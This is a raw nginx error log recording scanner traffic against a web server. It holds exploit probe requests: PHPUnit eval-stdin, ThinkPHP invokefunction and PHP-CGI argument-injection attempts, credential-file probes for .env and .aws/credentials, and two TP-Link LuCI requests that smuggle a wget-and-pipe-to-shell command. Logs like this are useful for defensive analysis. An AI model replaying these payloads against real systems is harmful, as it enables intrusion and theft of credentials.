22:26:39 [error] 843#843: *26985 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:40 [error] 843#843: *26985 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:40 [error] 843#843: *26985 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:40 [error] 843#843: *26985 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:40 [error] 843#843: *26985 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:41 [error] 843#843: *26985 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 23:09:14 [error] 843#843: *27051 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 01:36:21 [error] 855#855: *28921 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 206.168.34.57, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "222.117.41.51" -2026/02/16 03:00:30 [error] 854#854: *30562 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 115.231.78.11, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 04:31:24 [error] 854#854: *32280 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 206.168.34.63, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "222.117.41.51" -2026/02/16 04:31:58 [error] 854#854: *32281 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 105.155.199.178, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" -2026/02/16 04:43:58 [error] 855#855: *32326 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 135.237.126.148, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "222.117.41.51" -2026/02/16 06:31:39 [error] 867#867: *32580 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 64.62.156.122, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "222.117.41.51" -2026/02/16 06:33:47 [error] 866#866: *34070 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 64.62.156.122, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "222.117.41.51" -2026/02/16 07:36:29 [error] 866#866: *34156 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 07:36:29 [error] 866#866: *34156 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 07:36:29 [error] 866#866: *34156 open() "/var/www/html/.env.staging" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.staging HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 07:36:30 [error] 866#866: *34156 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 07:36:30 [error] 866#866: *34156 open() "/var/www/html/.env.development" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.development HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 07:36:30 [error] 866#866: *34156 open() "/var/www/html/.aws/credentials" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 07:36:31 [error] 866#866: *34156 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 07:36:31 [error] 866#866: *34156 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 08:34:25 [error] 860#860: *34200 "/var/www/html/HNAP1/index.html" is not found (2: No such file or directory), client: 182.121.171.223, server: localhost-nginx-proxy-manager, request: "POST /HNAP1/ HTTP/1.0", host: "222.117.41.51:80" -2026/02/16 09:52:08 [error] 862#862: *34322 open() "/var/www/html/druid/index.html" failed (2: No such file or directory), client: 20.65.195.53, server: localhost-nginx-proxy-manager, request: "GET /druid/index.html HTTP/1.1", host: "222.117.41.51" -2026/02/16 11:43:31 [error] 862#862: *35923 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 12:02:39 [error] 874#874: *35956 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 104.192.2.62, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51" -2026/02/16 13:42:13 [error] 878#878: *37548 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 152.32.250.21, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "222.117.41.51" -2026/02/16 13:42:13 [error] 878#878: *37549 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 152.32.250.21, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "222.117.41.51" -2026/02/16 13:42:13 [error] 878#878: *37550 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 152.32.250.21, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "222.117.41.51" -2026/02/16 15:54:02 [error] 874#874: *39230 open() "/var/www/html/portal/redlion" failed (2: No such file or directory), client: 40.74.212.73, server: localhost-nginx-proxy-manager, request: "GET /portal/redlion HTTP/1.1", host: "222.117.41.51" -2026/02/16 17:45:22 [error] 872#872: *39262 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 17:52:32 [error] 872#872: *39271 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 18:22:45 [error] 887#887: *39281 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 195.3.221.86, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 20:02:18 [error] 882#882: *39430 open() "/var/www/html/manager/text/list" failed (2: No such file or directory), client: 20.169.105.85, server: localhost-nginx-proxy-manager, request: "GET /manager/text/list HTTP/1.1", host: "222.117.41.51" -2026/02/16 20:07:05 [error] 882#882: *39435 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 221.159.119.6, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 20:07:05 [error] 882#882: *39436 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 221.159.119.6, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 20:34:09 [error] 882#882: *39532 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 20:40:18 [error] 882#882: *39551 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 20:42:10 [error] 882#882: *39569 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 195.178.110.162, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51" -2026/02/16 22:31:29 [error] 886#886: *39792 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "222.117.41.51" -2026/02/16 23:58:43 [error] 895#895: *39989 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 23:58:43 [error] 895#895: *39989 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 23:58:44 [error] 895#895: *39989 open() "/var/www/html/.env.staging" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.staging HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 23:58:45 [error] 895#895: *39989 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 23:58:46 [error] 895#895: *39989 open() "/var/www/html/.env.development" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.development HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 23:58:46 [error] 895#895: *39989 open() "/var/www/html/.aws/credentials" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 23:58:47 [error] 895#895: *39989 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/16 23:58:47 [error] 895#895: *39989 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 00:37:54 [error] 901#901: *40043 open() "/var/www/html/hudson" failed (2: No such file or directory), client: 20.163.14.222, server: localhost-nginx-proxy-manager, request: "GET /hudson HTTP/1.1", host: "222.117.41.51" -2026/02/17 00:43:58 [error] 902#902: *40045 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.80.88.32, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "222.117.41.51" -2026/02/17 02:27:54 [error] 898#898: *40379 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 03:40:10 [error] 896#896: *40750 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 03:40:50 [error] 899#899: *40765 open() "/var/www/html/WuEL" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /WuEL HTTP/1.1", host: "222.117.41.51" -2026/02/17 03:40:51 [error] 899#899: *40767 open() "/var/www/html/a" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /a HTTP/1.1", host: "222.117.41.51" -2026/02/17 03:40:52 [error] 899#899: *40768 open() "/var/www/html/download/file.ext" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /download/file.ext HTTP/1.1", host: "222.117.41.51" -2026/02/17 03:40:53 [error] 899#899: *40769 open() "/var/www/html/SiteLoader" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /SiteLoader HTTP/1.1", host: "222.117.41.51" -2026/02/17 03:40:53 [error] 899#899: *40770 open() "/var/www/html/mPlayer" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /mPlayer HTTP/1.1", host: "222.117.41.51" -2026/02/17 04:53:47 [error] 899#899: *42443 open() "/var/www/html/login" failed (2: No such file or directory), client: 167.94.138.201, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "222.117.41.51" -2026/02/17 05:11:42 [error] 899#899: *42445 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 20.65.193.129, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "222.117.41.51" -2026/02/17 06:37:50 [error] 912#912: *42487 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 184.105.247.195, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "222.117.41.51" -2026/02/17 06:40:28 [error] 912#912: *43975 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 184.105.247.195, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "222.117.41.51" -2026/02/17 06:54:12 [error] 912#912: *43981 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 124.29.214.186, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" -2026/02/17 07:00:00 [error] 912#912: *43988 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:01 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:01 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:02 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:02 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:03 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:04 [error] 912#912: *43988 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:05 [error] 912#912: *43988 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:05 [error] 912#912: *43988 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:06 [error] 912#912: *43988 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:07 [error] 912#912: *43988 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:07 [error] 912#912: *43988 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:08 [error] 912#912: *43988 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:08 [error] 912#912: *43988 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:08 [error] 912#912: *43988 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:09 [error] 912#912: *43988 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:09 [error] 912#912: *43988 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:10 [error] 912#912: *43988 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:10 [error] 912#912: *43988 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:11 [error] 912#912: *43988 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:11 [error] 912#912: *43988 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:12 [error] 912#912: *43988 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:13 [error] 912#912: *43988 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:13 [error] 912#912: *43988 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:14 [error] 912#912: *43988 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:15 [error] 912#912: *43988 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:15 [error] 912#912: *43988 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:16 [error] 912#912: *43988 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:16 [error] 912#912: *43988 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:17 [error] 912#912: *43988 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:18 [error] 912#912: *43988 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:18 [error] 912#912: *43988 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:19 [error] 912#912: *43988 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:20 [error] 912#912: *43988 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:20 [error] 912#912: *43988 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:21 [error] 912#912: *43988 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:21 [error] 912#912: *43988 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:22 [error] 912#912: *43988 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:23 [error] 912#912: *43988 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:23 [error] 912#912: *43988 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 07:00:25 [error] 912#912: *43988 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 08:11:07 [error] 913#913: *44053 open() "/var/www/html/.git/credentials" failed (2: No such file or directory), client: 195.178.110.162, server: localhost-nginx-proxy-manager, request: "GET /.git/credentials HTTP/1.1", host: "222.117.41.51" -2026/02/17 09:35:33 [error] 906#906: *44111 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:34 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:34 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/17 09:35:34 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: 